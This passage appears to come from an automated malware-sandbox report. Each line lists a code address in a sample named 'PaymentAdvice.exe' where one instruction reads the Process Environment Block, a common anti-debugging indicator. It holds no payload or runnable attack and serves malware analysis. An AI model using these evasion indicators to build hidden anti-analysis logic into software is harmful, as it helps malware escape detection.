Source: C:\Users\user\Desktop\PaymentAdvice.exe | Code function: 2_2_00A220A0 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\PaymentAdvice.exe | Code function: 2_2_00A220A0 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\PaymentAdvice.exe | Code function: 2_2_00A390AF mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\PaymentAdvice.exe | Code function: 2_2_00A2F0BF mov ecx, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\PaymentAdvice.exe | Code function: 2_2_00A2F0BF mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\PaymentAdvice.exe | Code function: 2_2_00A2F0BF mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\PaymentAdvice.exe | Code function: 2_2_009F9080 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\PaymentAdvice.exe | Code function: 2_2_00A73884 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\PaymentAdvice.exe | Code function: 2_2_00A73884 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\PaymentAdvice.exe | Code function: 2_2_009F58EC mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\PaymentAdvice.exe | Code function: 2_2_00A8B8D0 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\PaymentAdvice.exe | Code function: 2_2_00A8B8D0 mov ecx, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\PaymentAdvice.exe | Code function: 2_2_00A8B8D0 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\PaymentAdvice.exe | Code function: 2_2_00A8B8D0 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\PaymentAdvice.exe | Code function: 2_2_00A8B8D0 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\PaymentAdvice.exe | Code function: 2_2_00A8B8D0 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\PaymentAdvice.exe | Code function: 2_2_00A0B02A mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\PaymentAdvice.exe | Code function: 2_2_00A0B02A mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\PaymentAdvice.exe | Code function: 2_2_00A0B02A mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\PaymentAdvice.exe | Code function: 2_2_00A0B02A mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\PaymentAdvice.exe | Code function: 2_2_00A2002D mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\PaymentAdvice.exe | Code function: 2_2_00A2002D mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\PaymentAdvice.exe | Code function: 2_2_00A2002D mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\PaymentAdvice.exe | Code function: 2_2_00A2002D mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\PaymentAdvice.exe | Code function: 2_2_00A2002D mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\PaymentAdvice.exe | Code function: 2_2_00A77016 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\PaymentAdvice.exe | Code function: 2_2_00A77016 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\PaymentAdvice.exe | Code function: 2_2_00A77016 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\PaymentAdvice.exe | Code function: 2_2_00AC4015 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\PaymentAdvice.exe | Code function: 2_2_00AC4015 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\PaymentAdvice.exe | Code function: 2_2_00AB2073 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\PaymentAdvice.exe | Code function: 2_2_00AC1074 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\PaymentAdvice.exe | Code function: 2_2_00A10050 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\PaymentAdvice.exe | Code function: 2_2_00A10050 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\PaymentAdvice.exe | Code function: 2_2_00A769A6 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\PaymentAdvice.exe | Code function: 2_2_00A261A0 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\PaymentAdvice.exe | Code function: 2_2_00A261A0 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\PaymentAdvice.exe | Code function: 2_2_00A751BE mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\PaymentAdvice.exe | Code function: 2_2_00A751BE mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\PaymentAdvice.exe | Code function: 2_2_00A751BE mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\PaymentAdvice.exe | Code function: 2_2_00A751BE mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\PaymentAdvice.exe | Code function: 2_2_00A1C182 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\PaymentAdvice.exe | Code function: 2_2_00A2A185 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\PaymentAdvice.exe | Code function: 2_2_00A22990 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\PaymentAdvice.exe | Code function: 2_2_00A841E8 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\PaymentAdvice.exe | Code function: 2_2_009FB1E1 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\PaymentAdvice.exe | Code function: 2_2_009FB1E1 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\PaymentAdvice.exe | Code function: 2_2_009FB1E1 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\PaymentAdvice.exe | Code function: 2_2_00A14120 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\PaymentAdvice.exe | Code function: 2_2_00A14120 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\PaymentAdvice.exe | Code function: 2_2_00A14120 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\PaymentAdvice.exe | Code function: 2_2_00A14120 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\PaymentAdvice.exe | Code function: 2_2_00A14120 mov ecx, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\PaymentAdvice.exe | Code function: 2_2_00A2513A mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\PaymentAdvice.exe | Code function: 2_2_00A2513A mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\PaymentAdvice.exe | Code function: 2_2_009F9100 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\PaymentAdvice.exe | Code function: 2_2_009F9100 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\PaymentAdvice.exe | Code function: 2_2_009F9100 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\PaymentAdvice.exe | Code function: 2_2_00A1B944 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\PaymentAdvice.exe | Code function: 2_2_00A1B944 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\PaymentAdvice.exe | Code function: 2_2_009FB171 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\PaymentAdvice.exe | Code function: 2_2_009FB171 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\PaymentAdvice.exe | Code function: 2_2_009FC962 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\PaymentAdvice.exe | Code function: 2_2_00A0AAB0 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\PaymentAdvice.exe | Code function: 2_2_00A0AAB0 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\PaymentAdvice.exe | Code function: 2_2_00A2FAB0 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\PaymentAdvice.exe | Code function: 2_2_00A2D294 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\PaymentAdvice.exe | Code function: 2_2_00A2D294 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\PaymentAdvice.exe | Code function: 2_2_009F52A5 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\PaymentAdvice.exe | Code function: 2_2_009F52A5 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\PaymentAdvice.exe | Code function: 2_2_009F52A5 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\PaymentAdvice.exe | Code function: 2_2_009F52A5 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\PaymentAdvice.exe | Code function: 2_2_009F52A5 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\PaymentAdvice.exe | Code function: 2_2_00A22AE4 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\PaymentAdvice.exe | Code function: 2_2_00A22ACB mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\PaymentAdvice.exe | Code function: 2_2_009FAA16 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\PaymentAdvice.exe | Code function: 2_2_009FAA16 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\PaymentAdvice.exe | Code function: 2_2_00A34A2C mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\PaymentAdvice.exe | Code function: 2_2_00A34A2C mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\PaymentAdvice.exe | Code function: 2_2_009F5210 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\PaymentAdvice.exe | Code function: 2_2_009F5210 mov ecx, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\PaymentAdvice.exe | Code function: 2_2_009F5210 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\PaymentAdvice.exe | Code function: 2_2_009F5210 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\PaymentAdvice.exe | Code function: 2_2_00A08A0A mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\PaymentAdvice.exe | Code function: 2_2_00A13A1C mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\PaymentAdvice.exe | Code function: 2_2_00ABAA16 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\PaymentAdvice.exe | Code function: 2_2_00ABAA16 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\PaymentAdvice.exe | Code function: 2_2_00AAB260 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\PaymentAdvice.exe | Code function: 2_2_00AAB260 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\PaymentAdvice.exe | Code function: 2_2_00AC8A62 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\PaymentAdvice.exe | Code function: 2_2_00A3927A mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\PaymentAdvice.exe | Code function: 2_2_009F9240 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\PaymentAdvice.exe | Code function: 2_2_009F9240 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\PaymentAdvice.exe | Code function: 2_2_009F9240 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\PaymentAdvice.exe | Code function: 2_2_009F9240 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\PaymentAdvice.exe | Code function: 2_2_00ABEA55 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\PaymentAdvice.exe | Code function: 2_2_00A84257 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\PaymentAdvice.exe | Code function: 2_2_00AC5BA5 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\PaymentAdvice.exe | Code function: 2_2_00A24BAD mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\PaymentAdvice.exe | Code function: 2_2_00A24BAD mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\PaymentAdvice.exe | Code function: 2_2_00A24BAD mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\PaymentAdvice.exe | Code function: 2_2_00AB138A mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\PaymentAdvice.exe | Code function: 2_2_00AAD380 mov ecx, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\PaymentAdvice.exe | Code function: 2_2_00A01B8F mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\PaymentAdvice.exe | Code function: 2_2_00A01B8F mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\PaymentAdvice.exe | Code function: 2_2_00A2B390 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\PaymentAdvice.exe | Code function: 2_2_00A22397 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\PaymentAdvice.exe | Code function: 2_2_00A203E2 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\PaymentAdvice.exe | Code function: 2_2_00A203E2 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\PaymentAdvice.exe | Code function: 2_2_00A203E2 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\PaymentAdvice.exe | Code function: 2_2_00A203E2 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\PaymentAdvice.exe | Code function: 2_2_00A203E2 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\PaymentAdvice.exe | Code function: 2_2_00A203E2 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\PaymentAdvice.exe | Code function: 2_2_00A1DBE9 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\PaymentAdvice.exe | Code function: 2_2_00A753CA mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\PaymentAdvice.exe | Code function: 2_2_00A753CA mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\PaymentAdvice.exe | Code function: 2_2_00AB131B mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\PaymentAdvice.exe | Code function: 2_2_009FF358 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\PaymentAdvice.exe | Code function: 2_2_00A23B7A mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\PaymentAdvice.exe | Code function: 2_2_00A23B7A mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\PaymentAdvice.exe | Code function: 2_2_009FDB40 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\PaymentAdvice.exe | Code function: 2_2_00AC8B58 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\PaymentAdvice.exe | Code function: 2_2_009FDB60 mov ecx, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\PaymentAdvice.exe | Code function: 2_2_00A0849B mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\PaymentAdvice.exe | Code function: 2_2_00AB14FB mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\PaymentAdvice.exe | Code function: 2_2_00A76CF0 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\PaymentAdvice.exe | Code function: 2_2_00A76CF0 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\PaymentAdvice.exe | Code function: 2_2_00A76CF0 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\PaymentAdvice.exe | Code function: 2_2_00AC8CD6 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\PaymentAdvice.exe | Code function: 2_2_00A2BC2C mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\PaymentAdvice.exe | Code function: 2_2_00AC740D mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\PaymentAdvice.exe | Code function: 2_2_00AC740D mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\PaymentAdvice.exe | Code function: 2_2_00AC740D mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\PaymentAdvice.exe | Code function: 2_2_00AB1C06 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\PaymentAdvice.exe | Code function: 2_2_00AB1C06 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\PaymentAdvice.exe | Code function: 2_2_00AB1C06 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\PaymentAdvice.exe | Code function: 2_2_00AB1C06 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\PaymentAdvice.exe | Code function: 2_2_00AB1C06 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\PaymentAdvice.exe | Code function: 2_2_00AB1C06 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\PaymentAdvice.exe | Code function: 2_2_00AB1C06 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\PaymentAdvice.exe | Code function: 2_2_00AB1C06 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\PaymentAdvice.exe | Code function: 2_2_00AB1C06 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\PaymentAdvice.exe | Code function: 2_2_00AB1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PaymentAdvice.exeCode function: 2_2_00AB1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PaymentAdvice.exeCode function: 2_2_00AB1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PaymentAdvice.exeCode function: 2_2_00AB1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PaymentAdvice.exeCode function: 2_2_00AB1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PaymentAdvice.exeCode function: 2_2_00A76C0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PaymentAdvice.exeCode function: 2_2_00A76C0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PaymentAdvice.exeCode function: 2_2_00A76C0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PaymentAdvice.exeCode function: 2_2_00A76C0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PaymentAdvice.exeCode function: 2_2_00A1746D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PaymentAdvice.exeCode function: 2_2_00A2A44B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PaymentAdvice.exeCode function: 2_2_00A8C450 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PaymentAdvice.exeCode function: 2_2_00A8C450 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PaymentAdvice.exeCode function: 2_2_00AC05AC mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PaymentAdvice.exeCode function: 2_2_00AC05AC mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PaymentAdvice.exeCode function: 2_2_00A235A1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PaymentAdvice.exeCode function: 2_2_009F2D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PaymentAdvice.exeCode function: 2_2_009F2D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PaymentAdvice.exeCode function: 2_2_009F2D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PaymentAdvice.exeCode function: 2_2_009F2D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PaymentAdvice.exeCode function: 2_2_009F2D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PaymentAdvice.exeCode function: 2_2_00A21DB5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PaymentAdvice.exeCode function: 2_2_00A21DB5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PaymentAdvice.exeCode function: 2_2_00A21DB5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PaymentAdvice.exeCode function: 2_2_00A22581 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PaymentAdvice.exeCode function: 2_2_00A22581 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PaymentAdvice.exeCode function: 2_2_00A22581 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PaymentAdvice.exeCode function: 2_2_00A22581 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PaymentAdvice.exeCode function: 2_2_00A2FD9B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PaymentAdvice.exeCode function: 2_2_00A2FD9B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PaymentAdvice.exeCode function: 2_2_00A0D5E0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PaymentAdvice.exeCode function: 2_2_00A0D5E0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PaymentAdvice.exeCode function: 2_2_00ABFDE2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PaymentAdvice.exeCode function: 2_2_00ABFDE2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PaymentAdvice.exeCode function: 2_2_00ABFDE2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PaymentAdvice.exeCode function: 2_2_00ABFDE2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PaymentAdvice.exeCode function: 2_2_00AA8DF1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PaymentAdvice.exeCode function: 2_2_00A76DC9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PaymentAdvice.exeCode function: 2_2_00A76DC9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PaymentAdvice.exeCode function: 2_2_00A76DC9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PaymentAdvice.exeCode function: 2_2_00A76DC9 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PaymentAdvice.exeCode function: 2_2_00A76DC9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PaymentAdvice.exeCode function: 2_2_00A76DC9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PaymentAdvice.exeCode function: 2_2_00A7A537 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PaymentAdvice.exeCode function: 2_2_00ABE539 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PaymentAdvice.exeCode function: 2_2_00A03D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PaymentAdvice.exeCode function: 2_2_00A03D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PaymentAdvice.exeCode function: 2_2_00A03D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PaymentAdvice.exeCode function: 2_2_00A03D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PaymentAdvice.exeCode function: 2_2_00A03D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PaymentAdvice.exeCode function: 2_2_00A03D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PaymentAdvice.exeCode function: 2_2_00A03D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PaymentAdvice.exeCode function: 2_2_00A03D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PaymentAdvice.exeCode function: 2_2_00A03D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PaymentAdvice.exeCode function: 2_2_00A03D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PaymentAdvice.exeCode function: 2_2_00A03D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PaymentAdvice.exeCode function: 2_2_00A03D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PaymentAdvice.exeCode function: 2_2_00A03D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PaymentAdvice.exeCode function: 2_2_00AC8D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PaymentAdvice.exeCode function: 2_2_00A24D3B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PaymentAdvice.exeCode function: 2_2_00A24D3B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PaymentAdvice.exeCode function: 2_2_00A24D3B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PaymentAdvice.exeCode function: 2_2_009FAD30 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PaymentAdvice.exeCode function: 2_2_00A1C577 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PaymentAdvice.exeCode function: 2_2_00A1C577 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PaymentAdvice.exeCode function: 2_2_00A33D43 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PaymentAdvice.exeCode function: 2_2_00A73540 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PaymentAdvice.exeCode function: 2_2_00A17D50 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PaymentAdvice.exeCode function: 2_2_00A746A7 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PaymentAdvice.exeCode function: 2_2_00AC0EA5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PaymentAdvice.exeCode function: 2_2_00AC0EA5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PaymentAdvice.exeCode function: 2_2_00AC0EA5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PaymentAdvice.exeCode function: 2_2_00A8FE87 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PaymentAdvice.exeCode function: 2_2_00A216E0 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PaymentAdvice.exeCode function: 2_2_00A076E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PaymentAdvice.exeCode function: 2_2_00A38EC7 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PaymentAdvice.exeCode function: 2_2_00AAFEC0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PaymentAdvice.exeCode function: 2_2_00A236CC mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PaymentAdvice.exeCode function: 2_2_00AC8ED6 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PaymentAdvice.exeCode function: 2_2_00AAFE3F mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PaymentAdvice.exeCode function: 2_2_009FC600 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PaymentAdvice.exeCode function: 2_2_009FC600 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PaymentAdvice.exeCode function: 2_2_009FC600 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PaymentAdvice.exeCode function: 2_2_00A28E00 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PaymentAdvice.exeCode function: 2_2_00AB1608 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PaymentAdvice.exeCode function: 2_2_00A2A61C mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PaymentAdvice.exeCode function: 2_2_00A2A61C mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PaymentAdvice.exeCode function: 2_2_009FE620 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PaymentAdvice.exeCode function: 2_2_00A0766D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PaymentAdvice.exeCode function: 2_2_00A1AE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PaymentAdvice.exeCode function: 2_2_00A1AE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PaymentAdvice.exeCode function: 2_2_00A1AE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PaymentAdvice.exeCode function: 2_2_00A1AE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PaymentAdvice.exeCode function: 2_2_00A1AE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PaymentAdvice.exeCode function: 2_2_00A07E41 mov eax, dword ptr fs:[00000030h]
